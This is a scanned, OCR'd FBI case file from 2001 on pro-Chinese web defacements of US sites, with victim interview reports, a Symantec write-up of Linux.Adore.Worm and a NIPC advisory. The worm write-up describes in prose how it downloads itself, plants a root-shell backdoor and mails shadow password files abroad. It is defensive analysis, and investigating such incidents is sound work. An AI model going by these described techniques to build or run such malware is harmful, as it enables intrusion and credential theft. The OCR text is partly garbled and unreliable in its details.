Baldwin, New York 11510 
516-8676-6752 ext 


Analvtic 
National Football League 


b7C 
2 b7E 


NFL Players Association 
b6 
b7C 


212-285-4700 ext[ ] 
On-Line Data Solutions 
1919 Middle Country Road 


Centereach, New York 11720 
631-737-4668 ext 


(Rev. 08-28-2000) 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/08/2001 


To: Chicago Attn: SA[ | ] 


From: New York 
C-37 


Approved By 


Drafted By: 


Case ID d: ending) 


Pending) 


Title:  HACKER HONKER UNION INA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
IP/C 
OO:CG 


Synopsis: To provide Chicago with list of New York victims. 


Administrative: Reference telephone call between sal 
and SA[ ] on 05/07/2001. 


Enclosures: Enclosed for Chicago is one original, and two copies 
of an investigative insert containing listings of New York area 
victims. 


Details: On 05/07/2001, writer received several telephone calls 
from companies in the New York area that had experienced web 
defacements. All these defacements attacked their Windows NT IIS 
system, and replaced their home page with red text on a black 
Screen that said "Fuck the US Government, Fuck Poizonbox." 


New York is not taking any investigative action in this matter, 
and is providing the list of victims for whatever action Chicago 
deems appropriate. 


b3 
b6 
b7C 
b7E 


b6 
b"7C 


b7E 


To: Chicago A New York o 
b7E 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO, IL 


Read and clear. Information provided for whatever 
action Chicago deems appropriate. 


++ 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/10/2001 


telephone was interviewed at his b6 
place of work, Bay Networking Technologies (BNT), 3737 Ended b7C 
t, Suite 507, Mobile, Alabama, 36693-4363, telephone 


After being advised of the identity of the interviewing agent 
and the nature of the interview, he provided the following 
information: 


BNT provides computer network maintenance and support in 
the Mobile area. One of the BNT's clients is the United Way of 
Mobile. On 05/06/2001 and again on 05/08/2001, the United Way of 
Mobile Community Alliance Network (UWM-CAN) home page was deleted 
and replaced with a web page the stated 'fuck USA Government, fuck 
PoizonBOx'. BNT has a 120 hour/month contract to support the UWM- 
CAN network for the cost of $5400/month. 


[ advised the UWM-CAN web page is hosted on an Intel b6 
based machine running Microsoft Windows NT 4.0 with service pack 4. b7C 
The machine had the C:\ drive shared during the time of the web 
defacement. The machine is connected to a switch to a Cisco 2620 
router, which is then connected to the Internet through their 
service provider, Actel Communications. 


[-——— ——]lteiephone| who is employed at b6 


the Mobile County Health Department Teen Center, contacted BNT at b7C 
approximately 1:00 p.m. on 05/07/2001 to advise tbe web site had 

been defaced. Log files indicate the page was hacked at 

approximately 05/04/2001 at 7:46 p.m.. fixed the web page, 

applied several software patches to the server, and it was again 

hacked on 05/08/2001 at approximately 9:24 p.m. and replaced with 

the same web page. The log file from 05/04/2001 was deleted after 

the defacement, although the 05/08/2001 log file remained. 


advised the files which were modified in the Inetpub b6 
directory were the following: index.htm, index.asp, default.htm, b7C 
default.asp. These pages were also located and changed on the C:\ 
drive of the server computer. 


Laon deù a list of IP addresses he thought were 


suspicious as well as a CD-ROM containing a copy of the Inetpub 
directory from the hacked server. 


Investigation on 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/16/2001 


date of birth was Bs 
interviewed at his place of work, OnLine Information Services, 4656 bức 
Airport Boulevard, Suite 206, Mobile, Alabama, telephone 
mcm Also present during the interview was GE been 
of the Mobile Police Department, and date of 


birth[ ^ — ] After being advised as to the identity of 
the interviewers and to the nature of the interview, 
provided the following information: 


De of OnLine Information Services. b6 
OnLine Information Services (OLIS) operates the following Internet bức 


domains:  OLIS.com, ALACOURT.com, USCOURTS.com, GULFMAIL.com and 
GULFMALL.com.  OLIS provides public court documents and state trial 
records for a fee to subscribers.  OLIS.com provides court records 
for Mobile and Baldwin Counties (Alabama), ALACOURT.com provides 
court records for Alabama state trial court, and USCOURTS.com 
provides online records for Cook County, Illinois. Additionally 
OLIS provides e-mail notification to subscribing attorneys 
regarding cases in which the attorneys have an interest. 


The OLIS web pages are hosted on a Microsoft Windows NT 
Server, version 4.0, with IP address 209.12.154.30. On 
approximately May 9, 2001, between 5:00 and 5:30 a.m., the 
C\INETPUB Directory, which hosts the web pages for WWW.GULFMAIL.com 
and WWW.GULFMALL.com were replaced on the server. The INDEX.HTM 
page and DEFAULT.HTM page were replaced by an HTML page containing 
a black background with red letters that stated "fuck USA 
Government, fuckPoizonBOx.com". Two files were also added in the 
INETPUB Directory, which were DEFAULT.ASP and INDEX.ASP. 


On approximately April 22nd, in what[  —  . ]believes is b6 
an unrelated incident, the Mobile Bar Association web page, which b7C 
is hosted on the F:/ drive of the same server computer, was deleted 
and a single file remained with the name 'Shadowland'. 


[| provided the FBI two CD-ROMs containing a backup 
of the INETPUB Directory from the affected server as well as log 
files from the server computer. One of the CD-ROMs contains the 


Investigation on 


5/11/01 at Mobile, Alabama 


b3 
File Date dictated 5/15/01 b6 
ie 
by b7E 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


fed E e 
mal, (Rev. 10-6-95) 


Ce » 


b6 
b7C 


2 b7E 
1 
`"  n ET „Oon 5/11/0 „Page _ -2 


Windows registry as well as the NT backup of the affected server 
computer. 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/10/2001 


also known as[____]| date of birth b6 
was interviewed at his place of work, The-Store.com, b7C 
3300 Old Shell Road, Mobile, Alabama, telephon| | JAtter 


being advised of the identity of the interviewing agent and the 
nature of the interview, he provided the following information: 


—— mt The-Store.com, and online 
retailer. On 05/03/20001 at approximately 5:45 p.m., The- 


Store.com's main web page was replaced with a web page from the 
'Honker Union of China’. 


The-Store.com's web page is hosted by a company called 
NetExtra, and the servers are located in New Jersey. The contact at 
NetExtra j S supportefmphosting. net, b6 
telephone NetExtra is hosting The- b7C 
Store.com's web page on a Microsoft Windows NT machine bii ERE 


is unaware of which release of NT NetExtra is running. 
contacted[ ` ` Land advised that The-Store.com was the 
only company web site defaced on the server he manages, even though 
there were several other sites hosted on the same server. The 
index.htm page was replaced and the web site was down for 
approximately 15 minutes. 


further advised the web site had not been backed up b6 
properly at NetExtra, so it has taken approximately 150 man b7C 
hours to rebuild The-Store.com's web site.[ ^ |puts most of his 
profit from the company back into the business, so it is difficult 
to quantify a dollar amount loss as a result of this incident other 
than recovery time spent. 


O Eise the log files and noted the following two IP b6 
addr 


Were unusual: 209.17.142.62 (wilt.fireplug.net), and b7C 
146.209.128.247 (ptest.kochind.com). 


S the FBI copies of log files showing IP 
addresses of computers which accessed the web site and a copy of an 


email sent to him from Security-Focus.com regarding the incident. 


Investigation on 


05/10/2001 at Mobile, Alabama 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/06/2001 
To: Chicago 


From: Chicago 
Squad VC-5 


Contact: sa[ — x3 9108 


Approved By: 


Drafted By: 
Case ID #: 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To open sub file for the above captioned case. 


Details: Due to the volume of articles dedicated to the cyber 
attacks committed by United States and Chinese based computer 
hackers against sites originating from the United States and 
China, S requests the following sub file be open: 
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hite male, Date of Birth 
Social Security Account Number (SSAN) 
THE EDCOMM GROUP (TEG), 501 Office Center Drive, Fort Washington, 
Pennsylvania (PA) 19034, telephone was 
telephonically interviewed on April 30 and May 01, 2001. After 
being advised of the official identity of the interviewing agent 
and the nature of the ie fen a provided the 
following information: 


L__ ]statea that TEG is an education communication firm. 
One of TEG's client companies is Union Bank of California (UBOC), 
located in Los Angeles, California (CA). 


explained that at approximately 11:30AM, Eastern 
Daylight Time (EDT), on April 30, 2001, one of TEG's computers was 
attacked and that its website at www.euboc.net was defaced with 
pro-Chinese and Anti-United Stat oric. The website 
www.euboc.net is UBOC's website. added that the physical 
location of the victim computer is in San Jose, CA. TEG owns the 
following Internet Protocol addresses: 


128.121.239.81 
128.121.236.181 
128.121.236.182 
added that VERIO INC. (VERIO) is the host compan 
for TEG and that victim computer is leased by VERIO to TEG 
had spoken to [P VERIO, telephone (703) 642-2800 about 
the incident. 


04/30/2001 at Philadelphia, Pennsylvania (telephonically) 
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white male, Date o irth 
l Security Account Number (SSAN) BIC 
THE EDCOMM GROUP (TEG), 501 Office Center Drive, Fort 
Washington, Pennsylvania (PA) 19034, telephond -a was 
interviewed at his place of employment. After being advised of the 


official In of the interviewing agent and the nature of the 


interview, voluntarily provided the following information: 
[| stated that TEG, an education communication firm, b6 
has been in existence for two years. PIC 


[ ^ ]stated that TEG has a client, UNION BANK OF 
CALIFORNIA (UBOC), located in Los Angeles, California (CA). TEG 
operates one of UBOC's software applications known as Team Action 
Center (TAC). TAC is an application which helps: manage and 
facilitate project management. TAC operates off of the website 
www.euboc.net. TEG manages www.euboc.net for UBOC as well as the 
TAC application. 


On April 30, 2001, at approximately 11:30AM, Eastern 
Daylight Time (EDT), UBOC informed  ]that their website, b6 
www.euboc.net, was compromised.[ ^  ]investigated the incident and b7C 
found the website www.euboc.net to be defaced and modified in its 
appearance.[  ]explained that the website no longer contained 
the home page for UBOC but rather contained Anti-United States and 
Pro-Chinese rhetoric.[ ^ ^ ]added that the server operating 
www.euboc.net was running off of the Windows 2000 Operating System 
(OS) platform. 


[ — ]expiainea that at approximately 12:00 PM, he b6 
attempted to gain control of the www.euboc.net website, and BIG 
discovered his administration account was deleted. RS lcontacted 
VERIO, who is the hosting company for the www.euboc.net AP VER and 
reported the problems he was encountering. 

At 1:00PM, |__| stated VERIO was able to restore his 
administration account, however VERIO was unable to restore all of 
his permissions to that account[ | luas able to restore the home 
page for www.euboc.net. But within an hour, the www.euboc.net home 
page was reconfigured back to the page with Anti-United States and 

Investigation on 05/10/2001 a Fort Washington, Pennsylvania 
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Continuation of FD-302 of BEEN ,On 05 / 10 / 2001 , Page 2 


Pro-Chinese rhetoric. Immediately after the second web defacement 
incident occurred,[___ linstructed VERIO to shutdown the server. 
VERIO immediately shutdown the www.euboc.net server. 


L |] stated that the TAC application, also known as 
eTAC, was contracted to UBOC with the value of $500,000. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/15/2001 
To: Counterterrorism Attn: SS 
VChicago SA 
Los Angeles SA 
EN Philadelphia 
Squad 9 
Contact: SA 215-418-4313 


Approved By: 


Drafted By: 
Case ID #: Pending) 
Pending) 
(Pending) 


Title:  UNSUB(s); 
UNION BANK OF CALIFORNIA- Victim; 
INTRUSION- Banking and Finance 


Synopsis: Results of lead investigation conducted in 
Philadelphia, Pennsylvania. 


Enclosure(s): Original and one (1) copy of FD-302 interview 
reports with [fer Los Angeles Division. One (1) 
information copy o FD-302 interview reports for Chicago 
Division. 

Details: On April 30, 2001, the Philadelphia office, Federal 


Bureau of Investigation (FBI) handled a computer intrusion 
pein te M REDE REIN MEC EE 


Group, 501 Office Cen d t Washington, Pennsylvania 
(PA) 19034, telephone 


Stated that the Edcomm Group is an education 
communication firm and that Union Bank of California is one of 
The Edcomm Group's client businesses. 


mem that at approximately 11:30AM, Eastern 
Daylight Time (EDT), on April 30, 2001, the victim computer was 
attacked and that its website at www.euboc.net was defaced with 
pro-Chinese and Anti-United States rhetoric.[ | ]added that the 
physical location of the victim computer is in San Jose, 
California (CA). 


b6 
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To: Counterterrorism, Chicago, Los Angeles E, SE 
Re: LI (Pending), 05/15/2001 


explained that the above mentioned website was 
completely compromised and eventually forced The Edcomm Group and 
Union Bank of California to transition to a secure Intranet 
architecture. The value of The Edcomm Group's contract with Union 
Bank of California is $500,000. 


Additional pertinent information regarding the in d 
was captured in the FD-302 reports on the interviews with 


advised FBI Philadelphia that Union Bank had 
contacted Los Angeles FBI and was informed that an investigation 
on the incident had been opened by Los Angeles FBI. 


Philadelphia FBI contacted Los Angeles FBI to discuss 
the facts of the case and concurred that Los Angeles would open 
the investigation and Philadelphia FBI would provide any support 
to Los Angeles FBI. 


Philadelphia FBI contacted SSA National 
Infrastructure Protection Center (NIPC). SSA is the point 
of contact at NIPC for investigations involving Chinese hackers. 
SSA[ ^  ]notified Philadelphia FBI that Chicago Division had 
opened an investigation involving the Chinese hacker attacks 
occurring at the end of April and the beginning of May, 2001. 


Philadelphia FBI has had frequent contact with Chicago 
FBI regarding the Chinese Hacker attack. Chicago FBI advised 
Philadelphia FBI to collect any and all intelligence, evidence, 
and analysis of the attacks and forward them to the Chicago case 
file. 


Philadelphia FBI is forwarding appropriate information 
pertaining to the above captioned victim to Los Angeles FBI and 
all information collected by Philadelphia FBI regarding the 
Chinese Hacker attack to Chicago FBI. 


Philadelphia FBI considers the Los Angeles lead 
investigation closed in Philadelphia, PA. 
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To: Counterterrorism, Chicago, Los Angeles From: Philadelphia 
Re: TI (Pending), 05/15/2001 


LEAD(s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 
AT WASHINGTON, D.C. 


Read and clear. 


Set Lead 2: (Adm) 
CHICAGO 


AT CHICAGO, ILLINOIS 


Read and clear. 
D 
Set Lead 3: (Adm) 
LOS ANGELES 


AT LOS ANGELES, CALIFORNIA 


Read and clear. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/02/2001 
To: Chicago 


From: Chicago 


Squad IP/C b3 
Contact: SA 12/786-3918 b6 
b7C 
Approved By: b7E 
Drafted By: 
Case ID d: Pending) 
Title: CHANGED 
Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 
Synopsis: To change title of the above captioned case. 
Previous Title: Title marked "Changed" to reflect the identification 
of the actual victim of the intrusion. Title previously carried as 
"Subject:  Hacker/Honker Union of China, Victim: Chicago Systems 
Group, Type: Intrusion, Date: 04/03/2001." b6 
b7C 
Details: On May 2, 2 
at Chicago Systems Group, was interviewed 
regarding a computer intrusion against one of his clients. During the 
interview, ] identified the victim of the intrusion as the 
computer network controlled by the Illinois Secretary of State. 
++ 
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Linux.Adore.Worm b 


Discovered on: April 4, 2001 
Last Updated on: April 9, 2001 at 03:39:42 PM PDT 


Linux.Adore.Worm is a worm that spreads on Linux systems. The worm targets vulnerabilities commonly found on default 
installations of Linux. Using these vulnerabilities, the worm gains root access to the system, downloads and executes 
itself, and then searches for new systems to infect. 


NOTE: The Linux rootkit known as Adore is unrelated to this worm. 
Also Known As: Linux.Red.Worm 

Category: Worm 

Virus Definitions: April 5, 2001 


Threat Assessment: 


o a ce 
ke Ze Ste 


Wild: ^ Damage: Distribution: 
Medium Medium Medium 


Wild: 


Number of infections: 50 - 999 
Number of sites: More than 10 


36 
36 
x Geographical distribution: Medium 
a Threat containment: Moderate 

36 


Removal: Moderate 


Damage: 


s Payload: 
a Modifies files: Replaces ps and klogd 
e Releases confidential info: Emails system information to anonymous addresses 
œ Compromises security settings: Creates a root shell backdoor 


Distribution: 
+ Target of infection: Linux systems with vulnerable wuftpd, bind, omg, or statd 


Technical description: 


Once gaining access to a system, the worm attempts to download a tar file from go.163.com. This site appears to have ra 
b7E 
Vi ae 


E 
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been closed, causing the worm to e. be effective. If it is able to download e. it does the following: 


1. The worm untars the file to /usr/lib/lib and executes a script, which begins the worm routine. 

2. It replaces ps with a Trojanized version, and backs up the original to /usr/bin/adore. 

3. Next, the worm adds a script to the daily cron job, which kills all of its processes except the installed backdoor by 
rebooting or using killall on the appropriate processes. The script also replaces the Trojanized ps. This allows the 
worm to propagate for a limited amount of time, but reduces the chances of being detected. 

4. Linux.Adore.Worm then adds the users ftp and anonymous to /etc/ftpusers, blocking the wuftpd hole, which is 
exploited. The worm also kills the rpc.statd, rpc.rstatd, and Ipd processes, preventing those vulnerabilities from 
being exploited. 

5. Next, the worm replaces klogd (kernel message logger) with a backdoor program that uses ICMP instead of the 
traditional TCP or UDP methods. The backdoor allows root shell access. 

6. The worm then sends information to two of four email addresses located in China. The ISP has been notified 
accordingly. The information includes the IP address of the compromised computer, the process list, the history, 
hosts file, and shadow password file. 

7. Finally, the worm executes the routines to find new systems to compromise. The worm generates random class- 
B IP addresses and checks to see if they are vulnerable to the common statd, !prng, wuftp, and bind vulnerabilities. 
If vulnerable, the worm exploits the vulnerability to gain access to the system. 


Information on patching the four vulnerabilities including links to patches can be found at: 


a LPRng: http://www.cert.org/advisories/CA-2000-22.html 

æ wu-ftpd 2.6: http://www.cert.org/advisories/CA-2000-193.html 
s Bind: http://www.cert.org/advisories/CA-2001-02.html 

a rpc.statd: http;/www.cert.org/advisories/CA-2000-17.html 


Removal instructions: 


Because infected systems contain commonly exploited vulnerabilities, the system is likely to have been previously 
compromised. SARC recommends the system be imaged to a standalone system for future forensic analysis, and 
replaced with a clean installation with the latest security patches. 


Write-up by: Eric Chien 
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Increased Internet Attacks Against 
U.S. Web Sites and Mail Servers Possible in Early May 


(Advisory 01-009) 


April 26, 2001 


Citing recent events between the United States and the People's Republic of China 
(PRC), malicious hackers have escalated web page defacements over the Internet. This 
communication is to advise network administrators of the potential for increased hacker activity 
directed at U.S. systems during the period of April 30, 2001 to May 7, 2001. Chinese hackers 
have publicly discussed increasing their activity during this period, which coincides with dates of 
historic significance in the PRC: May 1 is May Day; May 4 is Youth Day; and, May 7 is the 
anniversary of the accidental bombing of the Chinese Embassy in Belgrade. 


To date, hackers already have unlawfully defaced a number of U.S. web sites, replacing 
existing content with pro-Chinese or anti-U.S. rhetoric. In addition, the NIPC previously 
reported on an Internet worm named "Lion" that is infecting computers and installing distributed 
denial of service (DDOS) tools on various systems. Analysis of the Lion worm's source code 
reveals that, when illegally exploited, it sends password files from the victim site to an email 
address located in China. For more information on the Lion DDOS tool, refer to NIPC Advisory 
01-005. 


As a result of the activity already seen, together with public statements threatening 
increased illegal activity, network and system administrators are encouraged to more closely 
monitor their web sites and mail servers during April 30, 2001 through May 7, 2001 for attacks 
that could include web page defacements and denial-of-service attacks. 


Recipients of this advisory are encouraged to report computer intrusions to their local FBI 
office (http://www.fbi.gov/contact/fo/fo.htm) or the NIPC, and to other appropriate authorities. 
Incidents may be reported online at _http://www.NIPC.gov/incident/cirr.htm. The NIPC Watch 
and Warning Unit can be reached at (202) 323-3204/3205/3206 or NIPC. Watch@fbi.gov. 
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